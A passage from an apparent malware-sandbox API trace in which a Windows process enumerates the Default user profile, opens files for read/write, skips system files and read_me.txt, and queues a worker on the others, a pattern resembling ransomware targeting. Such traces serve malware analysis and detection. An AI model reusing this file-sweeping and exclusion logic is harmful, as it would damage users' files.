0x4f10000 [0082.982] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0082.982] GetProcessHeap () returned 0x4f10000 [0082.982] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\*") returned 22 [0082.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*", lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x253bcc60, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x253bcc60, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\.") returned 22 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x253bcc60, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x253bcc60, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\..") returned 23 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="AppData", cAlternateFileName="")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData") returned 28 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Application Data") returned 37 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Contacts", cAlternateFileName="")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Cookies", cAlternateFileName="")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0082.982] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24e87c40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e87c40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0082.982] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents") returned 30 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24f6c480, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24f6c480, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x25076e20, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x25076e20, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Links", cAlternateFileName="")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Links") returned 26 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="Music", cAlternateFileName="")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NetHood", cAlternateFileName="")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0082.983] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0082.983] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0082.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.983] StrStrW (lpFirst="ntuser.dat", lpSrch="read_me.txt") returned 0x0 [0082.983] StrStrW (lpFirst="ntuser.dat", lpSrch="autoexec.bat") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat", lpSrch="desktop.ini") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat", lpSrch="autorun.inf") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat", lpSrch="ntuser.dat") returned="ntuser.dat" [0082.984] CloseHandle (hObject=0x8c0) returned 1 [0082.984] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0082.984] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0082.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.984] StrStrW (lpFirst="ntuser.dat.log", lpSrch="read_me.txt") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat.log", lpSrch="autoexec.bat") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat.log", lpSrch="desktop.ini") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat.log", lpSrch="autorun.inf") returned 0x0 [0082.984] StrStrW (lpFirst="ntuser.dat.log", lpSrch="ntuser.dat") returned="ntuser.dat.log" [0082.984] CloseHandle (hObject=0x8c0) returned 1 [0082.984] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0082.985] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0082.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.985] StrStrW (lpFirst="ntuser.dat.log1", lpSrch="read_me.txt") returned 0x0 [0082.985] StrStrW (lpFirst="ntuser.dat.log1", lpSrch="autoexec.bat") returned 0x0 [0082.985] StrStrW (lpFirst="ntuser.dat.log1", lpSrch="desktop.ini") returned 0x0 [0082.985] StrStrW (lpFirst="ntuser.dat.log1", lpSrch="autorun.inf") returned 0x0 [0082.985] StrStrW (lpFirst="ntuser.dat.log1", lpSrch="ntuser.dat") returned="ntuser.dat.log1" [0082.985] CloseHandle (hObject=0x8c0) returned 1 [0082.985] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0082.985] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0082.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.985] StrStrW (lpFirst="ntuser.dat.log2", lpSrch="read_me.txt") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat.log2", lpSrch="autoexec.bat") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat.log2", lpSrch="desktop.ini") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat.log2", lpSrch="autorun.inf") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat.log2", lpSrch="ntuser.dat") returned="ntuser.dat.log2" [0082.986] CloseHandle (hObject=0x8c0) returned 1 [0082.986] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0082.986] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0082.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.986] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", lpSrch="read_me.txt") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", lpSrch="autoexec.bat") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", lpSrch="desktop.ini") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", lpSrch="autorun.inf") returned 0x0 [0082.986] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf", lpSrch="ntuser.dat") returned="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf" [0082.986] CloseHandle (hObject=0x8c0) returned 1 [0082.986] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0082.987] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0082.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="read_me.txt") returned 0x0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="autoexec.bat") returned 0x0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="desktop.ini") returned 0x0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="autorun.inf") returned 0x0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms", lpSrch="ntuser.dat") returned="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms" [0082.987] CloseHandle (hObject=0x8c0) returned 1 [0082.987] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0082.987] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0082.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.987] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="read_me.txt") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="autoexec.bat") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="desktop.ini") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="autorun.inf") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms", lpSrch="ntuser.dat") returned="ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms" [0082.988] CloseHandle (hObject=0x8c0) returned 1 [0082.988] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0082.988] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0082.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="read_me.txt") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="autoexec.bat") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="desktop.ini") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="autorun.inf") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="iconcache.db") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="bootsect.bak") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="boot.ini") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="ntuser.dat.log") returned 0x0 [0082.988] StrStrW (lpFirst="ntuser.ini", lpSrch="thumbs.db") returned 0x0 [0082.989] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 211 [0082.989] QueueUserWorkItem (Function=0x404e00, Context=0x8c0, Flags=0x0) returned 1 [0082.989] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: 